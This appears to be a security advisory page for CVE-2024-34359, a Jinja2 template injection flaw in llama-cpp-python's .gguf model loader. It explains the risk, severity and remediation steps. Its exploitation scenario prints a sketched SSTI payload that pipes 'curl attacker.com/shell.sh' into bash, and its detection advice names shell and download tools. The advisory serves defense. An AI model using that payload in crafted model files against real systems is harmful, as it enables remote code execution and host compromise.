CVE-2024-34359: llama-cpp-python: SSTI in .gguf loader enables RCE
CRITICAL PoC AVAILABLE CISA: ATTENDAny system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.
What is the risk?
Critical exposure for all llama-cpp-python deployments. CVSS 9.6 with network vector and low complexity means this is trivially weaponizable once a malicious .gguf is in circulation. The 'User Interaction Required' flag is misleading in AI/ML contexts — loading new models is routine workflow for developers, MLOps, and researchers, making this practically no barrier. Scope change (C:H/I:H/A:H) means full host takeover, not just model compromise. No evidence of active KEV exploitation at time of publication, but model-as-attack-vector is a maturing supply chain threat with high probability of real-world abuse.
How severe is it?
What is the attack surface?
What should I do?
6 steps-
Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.
-
Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries.
-
Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.
-
Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers).
-
Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.
-
Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-34359?
Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.
Is CVE-2024-34359 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-34359, increasing the risk of exploitation.
How to fix CVE-2024-34359?
1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing. 2. Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries. 3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files. 4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers). 5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry. 6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.
What systems are affected by CVE-2024-34359?
This vulnerability affects the following AI/ML architecture patterns: local LLM inference, model serving APIs, LLM application frameworks, AI development workstations, MLOps and CI/CD pipelines.
What is the CVSS score for CVE-2024-34359?
CVE-2024-34359 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 28.42%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0002.001 Models AML.T0010.003 Model AML.T0011.000 Unsafe AI Artifacts AML.T0018.002 Embed Malware AML.T0050 Command and Scripting Interpreter Compliance Controls Affected
What are the technical details?
Original Advisory
llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.
Exploitation Scenario
An adversary uploads a malicious .gguf model to Hugging Face under a convincing namespace (e.g., a typosquat of a popular model). The model's metadata contains a crafted chat_template field with a Jinja2 payload exploiting Python's object introspection: `{{ ''.__class__.__mro__[2].__subclasses__()[XXX]('curl attacker.com/shell.sh | bash', shell=True, ...) }}`. An ML engineer discovers the model via a search or dependency, pulls it for benchmarking, and calls `Llama(model_path='malicious.gguf')`. At instantiation — before any prompts are sent — the template is parsed and rendered in an unsandboxed environment, executing the payload. The adversary receives a reverse shell on the inference host with the privileges of the Python process, gaining access to GPU resources, environment secrets, and internal APIs.
Weaknesses (CWE)
CWE-76 — Improper Neutralization of Equivalent Special Elements: The product correctly neutralizes certain special elements, but it improperly neutralizes equivalent special elements.
- [Requirements] Programming languages and supporting technologies might be chosen which are not subject to these issues.
- [Implementation] Utilize an appropriate mix of allowlist and denylist parsing to filter equivalent special element syntax from all input.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Supply Chain CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Supply Chain CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same attack type: Supply Chain CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Supply Chain CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same attack type: Code Execution